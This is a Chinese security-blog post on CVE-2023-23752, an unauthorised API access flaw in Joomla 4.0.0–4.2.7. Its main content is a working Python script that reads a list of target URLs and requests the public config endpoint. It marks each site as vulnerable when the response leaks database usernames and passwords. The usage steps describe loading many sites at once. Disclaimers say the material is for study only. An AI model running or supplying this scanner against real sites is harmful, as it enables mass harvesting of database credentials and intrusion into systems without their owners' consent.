!! 🍁副条也精彩,🎄不要错过.
!! 由于微信公众号推送机制改变了,快来星标不迷路!
1免责声明
本公众号所发布的文章及工具只限交流学习,本公众号不承担任何责任!如有侵权,请告知我们立即删除。
2漏洞介绍
Joomla是一套全球知名的内容管理系统(CMS),其使用PHP语言加上MySQL数据库所开发,可以在Linux、Windows、MacOSX等各种不同的平台上运行。Joomla! CMS 版本4.0.0 - 4.2.7中由于对web 服务端点访问限制不当,可能导致未授权访问Rest API,造成敏感信息泄露(如数据库账号密码等)。
漏洞库链接
https://nvd.nist.gov/vuln/detail/CVE-2023-23752
3影响范围
Joomla! CMS 版本4.0.0 - 4.2.7
4验证脚本
#poc.py
import requests
from colorama import init,Fore
init(autoreset=True)
for urls in open('urls.txt'):
url=urls.replace('n','')
# url="https://host"
headers = {
'Upgrade-Insecure-Requests': '1',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'zh-CN,zh;q=0.9',
'Connection': 'close'
}
payload="/api/index.php/v1/config/application?public=true"
url1=url+payload
try:
res=requests.get(url=url1,headers=headers,timeout=5)
if 'user' in res.text and 'password' in res.text:
print(Fore.GREEN +"[+]存在漏洞:"+url1)
else:
print("[-]不存在漏洞:"+url1)
except Exception as e:
print(Fore.RED +'[!]访问失败:'+url1)
5使用方法
建一个文件夹,里面放poc.py,同级目录下再建一个urls.txt来放大量需要验证的网址,最后直接运行脚本就可以了,脚本写的比较垃,但是正常验证还是可以的,偶尔有误报
参考:https://mp.weixin.qq.com/s/moRsWNQp7yOlGL_2uYH4wA
扫码回复“加群”加入交流群
工具获取回复“burp”“awvs”“nessus”“ladon”"Forfity"等可以。
原文始发于微信公众号(WIN哥学安全):Joomla未授权访问漏洞(CVE-2023-23752)验证脚本
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论